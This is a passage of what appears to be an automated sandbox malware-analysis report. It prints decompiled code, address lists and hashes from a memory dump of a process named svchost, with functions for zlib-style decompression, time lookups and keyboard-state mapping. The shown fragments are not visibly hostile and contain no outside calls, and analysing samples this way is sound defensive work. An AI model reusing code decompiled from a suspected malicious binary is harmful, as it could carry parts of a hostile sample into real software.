							__esp + 0x3c = E00467F10(__esp + 0x3c, __esp + 0x34, __esp + 0x2c, __eax);
							__ecx =  *(__esp + 0x5c);
							__edx =  *(__esp + 0x38);
							__eax =  *(__esp + 0x3c);
							__ecx =  *(__esp + 0x44);
							__eax = E0045F990( *(__esp + 0x4c),  *(__esp + 0x44),  *(__esp + 0x3c),  *(__esp + 0x4c),  *(__esp + 0x5c));
							__ebx[1] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__eax =  *(__esp + 0x48);
								__edx =  *(__esp + 0x14);
								__ebx[8] = __esi;
								__ebx[7] = __ebp;
								__ebp =  *(__eax + 8);
								 *(__eax + 4) =  *(__esp + 0x14);
								__edx =  *__eax;
								__edi = __edi -  *__eax;
								__edx =  *(__esp + 0x44);
								__ebp = __edi -  *__eax +  *(__eax + 8);
								__eflags = __ebp;
								 *(__eax + 8) = __ebp;
								 *__eax = __edi;
								__ebx[0xd] =  *(__esp + 0x44);
								__eax = E00467F40(__ebx, __eax, 0xfffffffc);
								_pop(__edi);
								_pop(__esi);
								return __eax;
							} else {
								__esi = __esi >> 3;
								 *(__esp + 0x18) = __esi;
								__ebp = __ebp - 3;
								 *__ebx = 6;
								goto L4;
							}
							goto L127;
						case 0xc:
							L17:
							__esi = __esi >> 3;
							 *(__esp + 0x18) = __esi;
							__ebp = __ebp - 3;
							 *__ebx = 3;
							goto L4;
						case 0xd:
							L100:
							__eax =  *(__esp + 0x48);
							__ecx =  *(__esp + 0x14);
							 *__ebx = 9;
							__ebp = __ebp + 0xfffffffd;
							__esi = __esi >> 3;
							 *(__eax + 0x18) = "invalid block type";
							__ebx[8] = __esi;
							__ebx[7] = __ebp;
							__ebp =  *(__eax + 8);
							 *(__eax + 4) =  *(__esp + 0x14);
							__ecx =  *__eax;
							__edi = __edi -  *__eax;
							__ecx =  *(__esp + 0x48);
							__ebp = __edi -  *__eax +  *(__eax + 8);
							__eflags = __ebp;
							 *(__eax + 8) = __ebp;
							 *__eax = __edi;
							__ebx[0xd] =  *(__esp + 0x48);
							__eax = E00467F40(__ebx, __eax, 0xfffffffd);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							L127:
					}
				}
				_t456 =  *(_t507 + 0x48);
				_t465[8] =  *(_t507 + 0x18);
				_t465[7] = _t501;
				 *(4 + _t456) =  *(_t507 + 0x14);
				_t469 =  *(_t507 + 0x10);
				 *_t456 = _t469;
				_t503 =  *(8 + _t456) + _t469 -  *_t456;
				 *(8 + _t456) = _t503;
				_t465[0xd] =  *(_t507 + 0x48);
				return E00467F40(_t465, _t456, 0xfffffffe);
				goto L127;
			}














    0x00466803
    0x00466808
    0x00466815
    0x00466818
    0x0046681c
    0x0046681f
    0x00466823
    0x0046682a
    0x0046682e
    0x00466832
    0x0046683c
    0x00466834
    0x00466836
    0x00466836
    0x0046683e
    0x00466842
    0x00466842
    0x00466842
    0x00466847
    0x00000000
    0x00000000
    0x0046684d
    0x00000000
    0x00466854
    0x0046685b
    0x00000000
    0x0046685d
    0x0046685d
    0x00466861
    0x00466865
    0x0046686f
    0x00466872
    0x0046687e
    0x00466880
    0x00466883
    0x00466887
    0x00466889
    0x0046688d
    0x00466891
    0x00466895
    0x00000000
    0x00466897
    0x0046689d
    0x0046689f
    0x004668a4
    0x004668ac
    0x004668af
    0x00000000
    0x004668b1
    0x004668b1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004668b1
    0x004668af
    0x00000000
    0x00466895
    0x00466f74
    0x00466f78
    0x00466f7b
    0x00466f8b
    0x00466f8b
    0x00466f93
    0x00466f9a
    0x00466f9d
    0x00466fa0
    0x00466fb2
    0x00466fb2
    0x00000000
    0x00000000
    0x0046694a
    0x0046694e
    0x00466952
    0x00466956
    0x00466959
    0x00466987
    0x00466987
    0x00466989
    0x0046698b
    0x0046698d
    0x00466996
    0x00466996
    0x00466998
    0x00467079
    0x0046707d
    0x00467083
    0x00467087
    0x0046708e
    0x00467091
    0x00467094
    0x00467096
    0x00467099
    0x0046709b
    0x0046709b
    0x0046709d
    0x0046709f
    0x004670a4
    0x004670a7
    0x004670ab
    0x004670ae
    0x004670b6
    0x004670b7
    0x004670bd
    0x0046699e
    0x0046699e
    0x004669a0
    0x004669a2
    0x004669a4
    0x004669a7
    0x004669ab
    0x00000000
    0x004669b1
    0x004669b1
    0x004669b6
    0x004669b6
    0x00000000
    0x004669ab
    0x0046695b
    0x0046695b
    0x0046695b
    0x0046695d
    0x0046695f
    0x00000000
    0x00000000
    0x00466965
    0x00466967
    0x0046696b
    0x0046696d
    0x0046696e
    0x00466970
    0x00466972
    0x00466974
    0x00466977
    0x0046697b
    0x0046697d
    0x0046697e
    0x00466981
    0x00466985
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00466985
    0x0046703e
    0x00467042
    0x00467045
    0x00467048
    0x0046704a
    0x0046704d
    0x00467050
    0x00467052
    0x00467054
    0x00467056
    0x0046705a
    0x0046705a
    0x0046705c
    0x00467060
    0x00467066
    0x00467069
    0x00467071
    0x00467072
    0x00467078
    0x00467078
    0x00000000
    0x00000000
    0x004669bd
    0x004669c1
    0x004669c3
    0x004670be
    0x004670c2
    0x004670c6
    0x004670c9
    0x004670cd
    0x004670d0
    0x004670d2
    0x004670d5
    0x004670d7
    0x004670d9
    0x004670db
    0x004670df
    0x004670df
    0x004670e1
    0x004670e5
    0x004670ee
    0x004670f2
    0x004670f5
    0x004670fd
    0x004670fe
    0x00467104
    0x004669c9
    0x004669c9
    0x004669cd
    0x004669cf
    0x00466a76
    0x00466a76
    0x00466a79
    0x00466a81
    0x00466a83
    0x00466a85
    0x00466a85
    0x00466a87
    0x00466a89
    0x00466a8b
    0x00466a8b
    0x00466a8d
    0x00466a91
    0x00466a95
    0x00466a97
    0x00466a99
    0x00466a9c
    0x00466a9c
    0x00466a9c
    0x00466a9c
    0x00466a9e
    0x00466aa0
    0x00466aa4
    0x00466aa7
    0x00466aa9
    0x00466aa9
    0x00466aab
    0x00466aaf
    0x00466ab3
    0x00466ab7
    0x00466ab9
    0x00466abd
    0x00466ac0
    0x00466ac2
    0x00466ac4
    0x00466ac4
    0x00466ac6
    0x00466aca
    0x00466ace
    0x00466ad2
    0x00466ad5
    0x00466adb
    0x00466ade
    0x00466ae0
    0x00466ae2
    0x00466ae5
    0x00466ae5
    0x00000000
    0x004669d5
    0x004669d5
    0x004669d8
    0x004669dc
    0x004669de
    0x00466a05
    0x00466a05
    0x00466a09
    0x00466a10
    0x00466a13
    0x00466a18
    0x00466a1b
    0x00466a21
    0x00466a23
    0x00466a27
    0x00466a2b
    0x00466a34
    0x00466a37
    0x00466a37
    0x00466a2d
    0x00466a2f
    0x00466a31
    0x00466a31
    0x00466a39
    0x00466a3c
    0x00466a40
    0x00466a42
    0x00466a46
    0x00466a48
    0x00466a4b
    0x00466a4d
    0x00466a4f
    0x00466a51
    0x00466a53
    0x00466a57
    0x00466a60
    0x00466a64
    0x00466a64
    0x00466a59
    0x00466a59
    0x00466a5c
    0x00466a5c
    0x00466a66
    0x00466a66
    0x00466a4d
    0x00466a6a
    0x00466a6c
    0x00467105
    0x00467109
    0x0046710d
    0x00467110
    0x00467114
    0x00467117
    0x00467119
    0x0046711c
    0x0046711f
    0x00467121
    0x00467123
    0x00467125
    0x00467125
    0x00467127
    0x0046712a
    0x0046712d
    0x00467134
    0x0046713c
    0x0046713d
    0x00467143
    0x00466a72
    0x00466a72
    0x00000000
    0x00466a72
    0x004669e0
    0x004669e0
    0x004669e3
    0x004669e6
    0x004669e8
    0x00000000
    0x004669ea
    0x004669ea
    0x004669ec
    0x004669ee
    0x004669f2
    0x004669fb
    0x004669fb
    0x004669f4
    0x004669f4
    0x004669f7
    0x004669f7
    0x004669fd
    0x004669ff
    0x00466a03
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00466a03
    0x004669e8
    0x004669de
    0x004669cf
    0x00000000
    0x00000000
    0x00466aec
    0x00466af0
    0x00466af3
    0x00466b2b
    0x00466b2b
    0x00466b2d
    0x00466b32
    0x00466b34
    0x00466b37
    0x00466b3a
    0x00466b3d
    0x004671c3
    0x004671c3
    0x004671c7
    0x004671cb
    0x004671d3
    0x004671da
    0x004671dd
    0x004671e0
    0x004671e2
    0x004671e5
    0x004671e8
    0x004671ed
    0x004671ef
    0x004671f1
    0x004671f7
    0x004671f7
    0x004671fa
    0x004671fd
    0x00467200
    0x00467208
    0x00467209
    0x0046720f
    0x00466b43
    0x00466b45
    0x00466b4b
    0x00466b51
    0x00000000
    0x00466b57
    0x00466b57
    0x00466b5b
    0x00466b5d
    0x00466b60
    0x00466b63
    0x00466b6a
    0x00466b6d
    0x00466b6e
    0x00466b6f
    0x00466b72
    0x00466b75
    0x00466b78
    0x00466b7a
    0x00467187
    0x0046718b
    0x0046718e
    0x00467191
    0x00467193
    0x00467196
    0x00467199
    0x004671a2
    0x004671a4
    0x004671a6
    0x004671a6
    0x004671a9
    0x004671ac
    0x004671b0
    0x004671b3
    0x004671bb
    0x004671bc
    0x004671c2
    0x00466b80
    0x00466b80
    0x00466b83
    0x00466b86
    0x00466b8d
    0x00000000
    0x00466b8d
    0x00466b7a
    0x00466b51
    0x00466af5
    0x00466af5
    0x00466af9
    0x00466afd
    0x00466afd
    0x00466aff
    0x00000000
    0x00000000
    0x00466b05
    0x00466b07
    0x00466b08
    0x00466b0a
    0x00466b12
    0x00466b14
    0x00466b16
    0x00466b18
    0x00466b1b
    0x00466b1f
    0x00466b21
    0x00466b22
    0x00466b25
    0x00466b29
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00466b29
    0x00467144
    0x00467148
    0x0046714c
    0x0046714f
    0x00467152
    0x00467154
    0x00467157
    0x00467159
    0x0046715b
    0x00467161
    0x00467161
    0x00467163
    0x00467169
    0x00467170
    0x00467174
    0x00467177
    0x0046717f
    0x00467180
    0x00467186
    0x00467186
    0x00000000
    0x00000000
    0x00466b95
    0x00466b99
    0x00466b9d
    0x00466b9d
    0x00466ba0
    0x00466ba6
    0x00466ba9
    0x00466bab
    0x00466c1b
    0x00466c1b
    0x00466c1e
    0x00466c23
    0x00466c25
    0x00466c27
    0x00466c27
    0x00466c2a
    0x00466c31
    0x00466c34
    0x00466c3b
    0x00466c3e
    0x00466c3f
    0x00466c41
    0x00466c44
    0x00466c44
    0x00466c27
    0x00466c48
    0x00466c4c
    0x00466c4f
    0x00466c53
    0x00466c59
    0x00466c5f
    0x00466c67
    0x00466c6b
    0x00466c6d
    0x0046724f
    0x00467252
    0x00467255
    0x00467256
    0x00467257
    0x0046725a
    0x0046725e
    0x00467261
    0x00000000
    0x00466c73
    0x00466c73
    0x00466c76
    0x00000000
    0x00466c76
    0x00466bad
    0x00466bad
    0x00466bad
    0x00466bb0
    0x00000000
    0x00466bb2
    0x00466bb2
    0x00466bb6
    0x00466bb6
    0x00466bba
    0x00466bbc
    0x00000000
    0x00000000
    0x00466bc2
    0x00466bc4
    0x00466bc6
    0x00466bc9
    0x00466bcd
    0x00466bcf
    0x00466bd1
    0x00466bd4
    0x00466bd6
    0x00466bde
    0x00466be0
    0x00466be1
    0x00466be4
    0x00466be8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00466be8
    0x00467210
    0x00467214
    0x00467217
    0x0046721a
    0x0046721c
    0x0046721f
    0x00467221
    0x00467223
    0x00467225
    0x00467229
    0x00467229
    0x0046722b
    0x0046722e
    0x00467234
    0x0046723c
    0x0046723f
    0x00467247
    0x00467248
    0x0046724e
    0x0046724e
    0x00000000
    0x00466bea
    0x00466bea
    0x00466bed
    0x00466bef
    0x00466bf2
    0x00466bf5
    0x00466bfc
    0x00466bff
    0x00466c02
    0x00466c05
    0x00466c08
    0x00466c09
    0x00466c0c
    0x00466c11
    0x00466c14
    0x00466c17
    0x00466c17
    0x00000000
    0x00466bad
    0x00000000
    0x00000000
    0x00466c7e
    0x00466c82
    0x00466c86
    0x00466c86
    0x00466c89
    0x00466c8c
    0x00466c8e
    0x00466c91
    0x00466c94
    0x00466c97
    0x00466c97
    0x00466c9e
    0x00466ca0
    0x00466e31
    0x00466e31
    0x00466e34
    0x00466e39
    0x00466e3d
    0x00466e43
    0x00466e47
    0x00466e4c
    0x00466e52
    0x00466e55
    0x00466e58
    0x00466e5b
    0x00466e5d
    0x00466e64
    0x00466e6b
    0x00466e73
    0x00466e7b
    0x00466e80
    0x00466e83
    0x00466e87
    0x00466e8a
    0x00466e8b
    0x00466e8c
    0x00466e8f
    0x00466e93
    0x00466e96
    0x00466e98
    0x004672fc
    0x00467301
    0x00467301
    0x00467303
    0x00467303
    0x00467309
    0x0046730d
    0x00467311
    0x00467314
    0x00467317
    0x00467319
    0x0046731b
    0x0046731e
    0x00467321
    0x00467323
    0x00467325
    0x00467329
    0x00467329
    0x0046732b
    0x0046732e
    0x00467335
    0x00467338
    0x00467340
    0x00467341
    0x00467347
    0x00466e9e
    0x00466e9e
    0x00466ea2
    0x00466ea6
    0x00466eb3
    0x00466ebb
    0x00466ebd
    0x00467348
    0x0046734c
    0x00467350
    0x00467353
    0x00467356
    0x00467358
    0x0046735a
    0x0046735d
    0x00467360
    0x00467364
    0x00467364
    0x00467367
    0x0046736a
    0x0046736e
    0x00467371
    0x00467374
    0x0046737c
    0x0046737d
    0x00467383
    0x00466ec3
    0x00466ec3
    0x00466ec6
    0x00000000
    0x00466ec6
    0x00466ebd
    0x00466ca6
    0x00466ca6
    0x00466ca6
    0x00466ca9
    0x00466cab
    0x00466ce8
    0x00466ce8
    0x00466cef
    0x00466cf2
    0x00466cf4
    0x00466cfa
    0x00466cfd
    0x00466d01
    0x00466d04
    0x00466d07
    0x00466d0b
    0x00466d25
    0x00466d28
    0x00466d2d
    0x00466d2f
    0x00466d2f
    0x00466d2f
    0x00466d32
    0x00466d35
    0x00466d39
    0x00466d3b
    0x00466d3d
    0x00466d3f
    0x00466d41
    0x00466d45
    0x00466d48
    0x00466d4a
    0x00466d8f
    0x00466d8f
    0x00466d91
    0x00466d93
    0x00466d97
    0x00466d9e
    0x00466da0
    0x00466da2
    0x00466da6
    0x00466da8
    0x00466daa
    0x00466dae
    0x00466db0
    0x00466db3
    0x00466db7
    0x00466dba
    0x00466dbc
    0x00466dbf
    0x00466dc2
    0x00466dc5
    0x00466dc5
    0x00466dcc
    0x00466dd0
    0x00466dd2
    0x00466dd4
    0x004672a8
    0x004672a8
    0x004672ab
    0x004672ae
    0x004672af
    0x004672b0
    0x004672b3
    0x004672b7
    0x004672bb
    0x004672c1
    0x004672c8
    0x004672cb
    0x004672ce
    0x004672d0
    0x004672d2
    0x004672d5
    0x004672d8
    0x004672da
    0x004672dc
    0x004672e0
    0x004672e0
    0x004672e5
    0x004672e9
    0x004672ec
    0x004672f4
    0x004672f5
    0x004672fb
    0x00466dda
    0x00466dda
    0x00466ddf
    0x00466df5
    0x00466df9
    0x00466df9
    0x00000000
    0x00466de1
    0x00466de1
    0x00466de3
    0x00466de6
    0x00000000
    0x00466dec
    0x00466dec
    0x00466def
    0x00466dfb
    0x00466dfb
    0x00466dfb
    0x00466dfe
    0x00466dff
    0x00466e03
    0x00466e07
    0x00466e07
    0x00466e08
    0x00466e08
    0x00000000
    0x00466dfb
    0x00466de6
    0x00466ddf
    0x00466d4c
    0x00466d4c
    0x00466d4c
    0x00466d50
    0x00466d52
    0x00000000
    0x00000000
    0x00466d58
    0x00466d5a
    0x00466d5c
    0x00466d5d
    0x00466d65
    0x00466d69
    0x00466d6d
    0x00466d6f
    0x00466d71
    0x00466d73
    0x00466d75
    0x00466d79
    0x00466d7c
    0x00466d7e
    0x00466d7f
    0x00466d83
    0x00466d87
    0x00466d89
    0x00000000
    0x00466d8b
    0x00466d8b
    0x00000000
    0x00466d8b
    0x00000000
    0x00466d89
    0x00000000
    0x00466d4c
    0x00466d0d
    0x00466d0d
    0x00466d0f
    0x00466d11
    0x00466d14
    0x00466d16
    0x00466d19
    0x00466d1c
    0x00466d1f
    0x00000000
    0x00466d1f
    0x00466cad
    0x00466cad
    0x00466cad
    0x00466cb1
    0x00466cb3
    0x00000000
    0x00000000
    0x00466cb9
    0x00466cbb
    0x00466cbd
    0x00466cbe
    0x00466cc6
    0x00466cca
    0x00466cce
    0x00466cd0
    0x00466cd2
    0x00466cd4
    0x00466cd6
    0x00466cda
    0x00466cdd
    0x00466cdf
    0x00466ce0
    0x00466ce2
    0x00466ce6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00466ce6
    0x00467269
    0x00467269
    0x0046726d
    0x00467270
    0x00467273
    0x00467275
    0x00467278
    0x0046727a
    0x0046727c
    0x0046727e
    0x00467282
    0x00467282
    0x00467284
    0x00467287
    0x0046728d
    0x00467295
    0x00467298
    0x004672a0
    0x004672a1
    0x004672a7
    0x004672a7
    0x00000000
    0x00466e0e
    0x00466e0e
    0x00466e11
    0x00466e14
    0x00466e19
    0x00466e1c
    0x00466e22
    0x00466e22
    0x00466e29
    0x00466e29
    0x00000000
    0x00466ca6
    0x00000000
    0x00000000
    0x00466ece
    0x00466ed2
    0x00466ed6
    0x00466ed6
    0x00466eda
    0x00466ede
    0x00466ee1
    0x00466ee4
    0x00466ee6
    0x00466ee8
    0x00466eeb
    0x00466eee
    0x00466ef0
    0x00466ef2
    0x00466ef6
    0x00466ef8
    0x00466efb
    0x00466eff
    0x00466f00
    0x00466f01
    0x00466f02
    0x00466f05
    0x00466f0a
    0x00466f0d
    0x00466f10
    0x00000000
    0x00466f16
    0x00466f16
    0x00466f1b
    0x00466f28
    0x00466f2b
    0x00466f2e
    0x00466f30
    0x00466f33
    0x00466f36
    0x00466f3a
    0x00466f40
    0x00466f42
    0x00466f46
    0x00466f4a
    0x00466f4e
    0x00466f55
    0x00466f58
    0x00466f58
    0x00466f50
    0x00466f50
    0x00466f52
    0x00466f52
    0x00466f5a
    0x00466f5e
    0x00466f61
    0x00466f63
    0x00467384
    0x00000000
    0x00466f69
    0x00466f69
    0x00000000
    0x00466f69
    0x00466f63
    0x00000000
    0x00000000
    0x0046738c
    0x00467390
    0x00467394
    0x00467398
    0x00467398
    0x0046739c
    0x004673a2
    0x004673a7
    0x004673aa
    0x004673b0
    0x004673b2
    0x004673eb
    0x00000000
    0x004673b4
    0x004673b4
    0x004673b8
    0x004673bb
    0x004673be
    0x004673c2
    0x004673c4
    0x004673c7
    0x004673c9
    0x004673cb
    0x004673cd
    0x004673d0
    0x004673d0
    0x004673d2
    0x004673d5
    0x004673d8
    0x004673db
    0x004673e3
    0x004673e4
    0x004673ea
    0x004673ea
    0x00000000
    0x00000000
    0x004673f3
    0x004673f7
    0x004673fb
    0x004673ff
    0x004673ff
    0x00467403
    0x00467407
    0x0046740a
    0x0046740d
    0x0046740f
    0x00467411
    0x00467414
    0x00467417
    0x0046741b
    0x0046741b
    0x0046741e
    0x00467421
    0x00467424
    0x00467427
    0x0046742f
    0x00467430
    0x00467436
    0x00000000
    0x00000000
    0x00467437
    0x0046743b
    0x0046743f
    0x00467443
    0x00467446
    0x0046744a
    0x0046744d
    0x0046744f
    0x00467452
    0x00467455
    0x00467457
    0x00467459
    0x0046745b
    0x0046745f
    0x0046745f
    0x00467464
    0x00467468
    0x0046746b
    0x00467473
    0x00467474
    0x0046747a
    0x00000000
    0x00000000
    0x004668b8
    0x004668b8
    0x004668bb
    0x004668c3
    0x004668cb
    0x004668cd
    0x00000000
    0x00000000
    0x004668d6
    0x004668d6
    0x004668da
    0x004668de
    0x004668df
    0x004668e4
    0x004668ef
    0x004668f4
    0x004668f8
    0x004668fc
    0x00466901
    0x0046690d
    0x00466915
    0x00466918
    0x0046691a
    0x00466fb3
    0x00466fb7
    0x00466fbb
    0x00466fbe
    0x00466fc1
    0x00466fc4
    0x00466fc7
    0x00466fcb
    0x00466fcd
    0x00466fd1
    0x00466fd1
    0x00466fd6
    0x00466fd9
    0x00466fdc
    0x00466fdf
    0x00466fe7
    0x00466fe8
    0x00466fee
    0x00466920
    0x00466920
    0x00466923
    0x00466927
    0x0046692a
    0x00000000
    0x0046692a
    0x00000000
    0x00000000
    0x00466935
    0x00466935
    0x00466938
    0x0046693c
    0x0046693f
    0x00000000
    0x00000000
    0x00466fef
    0x00466fef
    0x00466ff3
    0x00466ff7
    0x00466ffd
    0x00467000
    0x00467003
    0x0046700a
    0x0046700d
    0x00467010
    0x00467013
    0x00467016
    0x0046701c
    0x0046701e
    0x00467022
    0x00467022
    0x00467025
    0x00467028
    0x0046702b
    0x0046702e
    0x00467036
    0x00467037
    0x0046703d
    0x00000000
    0x00000000
    0x0046684d
    0x0046747f
    0x00467487
    0x0046748a
    0x00467492
    0x00467495
    0x0046749d
    0x004674a5
    0x004674a8
    0x004674ac
    0x004674be
    0x00000000

    Strings
    • invalid bit length repeat, xrefs: 004672C1
    • invalid stored block lengths, xrefs: 00467087
    • too many length or distance symbols, xrefs: 004671D3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: invalid bit length repeat$invalid stored block lengths$too many length or distance symbols
    • API String ID: 0-949635641
    • Opcode ID: 4ed951b0de808db15d77643e92f994a85edc3b1f7fe2011e236e8778389e7139
    • Instruction ID: b1f58426f0a7f1efd00ac7b274d6638edc86d49f3a9b307181d52ea16562f27b
    • Opcode Fuzzy Hash: 4ed951b0de808db15d77643e92f994a85edc3b1f7fe2011e236e8778389e7139
    • Instruction Fuzzy Hash: BD9270B56083018FCB08CF19D98052ABBE5FFC9314F14896EE899CB359E735E845CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00472C10 Relevance: 4.6, APIs: 3, Instructions: 75timeCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E00472C10(void* __edi, void* __esi, intOrPtr* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				short _v54;
				struct _TIME_ZONE_INFORMATION _v208;
				signed int _t23;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_t39 = __esi;
				_t37 = __edi;
				GetLocalTime( &_v20);
				GetSystemTime( &_v36);
				_t43 = _v36.wMinute -  *0x4e17ea; // 0x0
				if(_t43 != 0) {
					L6:
					_t23 = GetTimeZoneInformation( &_v208);
					if(_t23 == 0xffffffff) {
						_t24 = _t23 | 0xffffffff;
					} else {
						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
							_t24 = 0;
						} else {
							_t24 = 1;
						}
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t37 = _t37;
					 *0x4e17d8 = _t24;
					_t39 = _t39;
					L14:
					_t31 = E0047BFD2(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
					_t36 = _a4;
					if(_t36 == 0) {
						return _t31;
					}
					 *_t36 = _t31;
					return _t31;
				}
				_t44 = _v36.wHour -  *0x4e17e8; // 0x0
				if(_t44 != 0) {
					goto L6;
				}
				_t45 = _v36.wDay -  *0x4e17e6; // 0x0
				if(_t45 != 0) {
					goto L6;
				}
				_t46 = _v36.wMonth -  *0x4e17e2; // 0x0
				if(_t46 != 0) {
					goto L6;
				}
				_t47 = _v36.wYear -  *0x4e17e0; // 0x0
				if(_t47 != 0) {
					goto L6;
				}
				_t24 =  *0x4e17d8; // 0x0
				goto L14;
			}


















    0x00472c10
    0x00472c10
    0x00472c1d
    0x00472c27
    0x00472c31
    0x00472c38
    0x00472c75
    0x00472c7c
    0x00472c85
    0x00472ca2
    0x00472c87
    0x00472c8a
    0x00472c9e
    0x00472c99
    0x00472c9b
    0x00472c9b
    0x00472c8a
    0x00472caf
    0x00472cb0
    0x00472cb1
    0x00472cb2
    0x00472cb3
    0x00472cb4
    0x00472cb9
    0x00472cba
    0x00472cd9
    0x00472cde
    0x00472ce6
    0x00472ceb
    0x00472ceb
    0x00472ce8
    0x00000000
    0x00472ce8
    0x00472c3e
    0x00472c45
    0x00000000
    0x00000000
    0x00472c4b
    0x00472c52
    0x00000000
    0x00000000
    0x00472c58
    0x00472c5f
    0x00000000
    0x00000000
    0x00472c65
    0x00472c6c
    0x00000000
    0x00000000
    0x00472c6e
    0x00000000

    APIs
    • GetLocalTime.KERNEL32(?), ref: 00472C1D
    • GetSystemTime.KERNEL32(?), ref: 00472C27
    • GetTimeZoneInformation.KERNEL32(?), ref: 00472C7C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Time$InformationLocalSystemZone
    • String ID:
    • API String ID: 2475273158-0
    • Opcode ID: ad26100524ea4ac7edeba87e8f98a9ff572eb253ceb25f3d3139af7711924d4a
    • Instruction ID: f2ed3fb4cf9e4f16fd8251fbfce2a44957ed7a6e711e2ae4757eda4351158606
    • Opcode Fuzzy Hash: ad26100524ea4ac7edeba87e8f98a9ff572eb253ceb25f3d3139af7711924d4a
    • Instruction Fuzzy Hash: 39215329800119ADCB21AF95D9446FF73B9EB19B50F404117FD55E62A0D3B84CC6C76C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041F080 Relevance: 4.5, APIs: 3, Instructions: 49keyboardCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0041F080(intOrPtr _a4) {
				signed int _t11;

				_t11 =  *(_a4 + 8) & 0x000000ff;
				if(_t11 < 0x60 || _t11 > 0x69) {
					if(_t11 != 0x6d) {
						if(_t11 != 0x6e) {
							if(_t11 != 0x6f) {
								goto L3;
							}
							_t11 = 0xbf;
							goto L4;
						}
						_t11 = 0xbe;
						goto L4;
					}
					_t11 = 0xbd;
					goto L4;
				} else {
					_t11 = _t11 + 0xffd0;
					L3:
					if(_t11 == 0x11) {
						L6:
						if(_t11 != 0x10 && GetKeyState(0x10) < 0) {
							_t11 = _t11 | 0x00004000;
						}
						if(_t11 != 0x12 && GetKeyState(0x12) < 0) {
							_t11 = _t11 | 0x00008000;
						}
						return _t11;
					}
					L4:
					if(GetKeyState(0x11) < 0) {
						_t11 = _t11 | 0x00002000;
					}
					goto L6;
				}
			}




    0x0041f095
    0x0041f09b
    0x0041f0f2
    0x0041f0ff
    0x0041f10c
    0x00000000
    0x00000000
    0x0041f10e
    0x00000000
    0x0041f10e
    0x0041f101
    0x00000000
    0x0041f101
    0x0041f0f4
    0x00000000
    0x0041f0a3
    0x0041f0a3
    0x0041f0a9
    0x0041f0ad
    0x0041f0be
    0x0041f0c2
    0x0041f0cd
    0x0041f0cd
    0x0041f0d7
    0x0041f0e2
    0x0041f0e2
    0x0041f0ed
    0x0041f0ed
    0x0041f0af
    0x0041f0b6
    0x0041f0b8
    0x0041f0b8
    0x00000000
    0x0041f0b6

    APIs
    • GetKeyState.USER32(00000011), ref: 0041F0B1
    • GetKeyState.USER32(00000010), ref: 0041F0C6
